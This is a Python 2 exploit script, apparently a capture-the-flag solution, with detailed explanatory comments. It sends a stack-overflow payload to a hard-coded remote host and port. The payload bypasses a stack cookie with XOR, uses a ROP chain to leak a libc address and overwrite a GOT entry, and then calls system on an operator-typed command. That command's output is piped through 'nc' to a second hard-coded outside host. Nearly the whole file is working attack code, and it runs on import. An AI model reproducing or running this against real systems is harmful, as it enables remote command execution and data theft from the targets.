#!/usr/bin/python
from Pwn import *
# Module-level connection helper shared by exploit() below; host and port are
# hard-coded for a single target.  `Pwn` comes from the project's own module
# (`from Pwn import *`), so the connect/send/recv/pack/pA/unpack/
# get_libc_offset API used later is not visible in this file.
p = Pwn(host='54.152.37.20',port=24242)
# Alternative construction without an explicit host (left commented out by the
# author; presumably Pwn supplies a default host -- confirm in the Pwn class).
# p = Pwn(port=24242)
def exploit():
    """Drive one session against the target through the global helper `p`.

    Python 2 script (raw_input, print statements).  Flow as written:
    prompt for a shell command, send a fixed-layout stack payload whose
    trailing words the author's comments describe as a cookie-XOR bypass
    ahead of a ROP chain, read back an 8-byte leak to derive a libc
    address, then send that address followed by the command string.
    Every address and padding length below is byte-exact for one specific
    binary/libc pairing and is not derived at runtime, so the function is
    meaningless against anything else.

    Side effects: reads stdin, opens and talks on the connection held in
    the module-level `p`, prints two lines.  Returns None.
    """
    # Command typed by the operator; raw_input returns a str in Python 2.
    shell = raw_input('> ')
    # The command's output is piped to a hard-coded host:port via nc -- this
    # literal is the outbound connection a network monitor would observe.
    back_connect = shell + ' | nc 128.199.171.28 8001'
    # ROP words, consumed on the target's stack as return addresses and
    # arguments.  Reading the chain top to bottom gives three calls:
    #   1. send(4, 0x0805f02c, 8, 0)        -- push 8 bytes out starting at
    #      the address the author labels "puts"
    #   2. recv(4, 0x0805f068, 4+len+1, 6)  -- read the reply into the
    #      address the author labels send@got
    #   3. system(0x0805f068 + 4)           -- argument is whatever follows
    #      the 4-byte word written by call 2 (see the final send below)
    # All addresses are static constants for this build; none comes from
    # the leak.
    rop = [
        0x8048740, # send
        0x080578f8, # pop 4 ; ret  (discards the four arguments above)
        0x4, # fd
        0x0805f02c, # puts  (source buffer of the 8-byte send)
        8, # size
        0x0, # flag
        0x8048720, # recv
        0x080578f8, # pop 4 ; ret
        0x4, # fd
        0x0805f068, # overwrite send@got with system
        4 + len(back_connect) + 1, # size: 4-byte address + command + 1
        0x6, # flag
        0x08048878, # system
        0x0805f068 + 4  # argument: bytes just past the overwritten word
    ]
    # Stack image.  Lengths come straight from the literals: 7 filler bytes,
    # the packed ROP words, padding to exactly 127 bytes, then the trailing
    # words.  The XOR constants imply the target combines this region with
    # values already on its stack, so a zero word leaves the existing value
    # unchanged -- inferred from the author's comments, not verified here.
    payload = 'AAAAAAA' + p.pA(rop)  # p.pA presumably packs each word as a 32-bit LE int -- confirm
    payload+= 'A'*(127 - len(payload))
    payload+= '\x00'*4 # cookie ^ zero = cookie
    payload+= '\x00'*4
    payload+= '\x00'*4 # use the same ebp
    payload+= p.pack(0x8e0 ^ 0x9e8) # point save ebp to own buffer :D
    payload+= p.pack(0x08056b39 ^ 0x08056AFA) # own ret address : nop; leave ; ret
    payload+= '\x00'*4 # use same args
    payload+= p.pack(0x9e) # break the loop
    payload+= 'A'*4
    p.connect()
    # One leading 0xff byte precedes the payload on the wire.
    p.send('\xff' + payload)
    # Exactly 8 bytes are expected back, matching the size argument of the
    # send() call in the chain; only the first 4 are decoded.
    leak = p.recv(8)
    puts_addr = p.unpack(leak[:4])
    # get_libc_offset is opaque here; given the result's name it presumably
    # returns the distance from puts to system in the matched libc -- confirm
    # against the Pwn class before trusting the printed value.
    system_addr = puts_addr - p.get_libc_offset(puts_addr,'puts')
    print '[+] puts():',hex(puts_addr)
    print '[+] system():',hex(system_addr)
    # Second send: a 4-byte address followed by the command string, which is
    # the layout the chain's recv()/system() pair consumes.
    p.send(p.pack(system_addr) + back_connect)
    # Interactive I/O helper left disabled by the author.
    # p.io()
# Runs at import time as well as on direct execution (no __main__ guard).
exploit()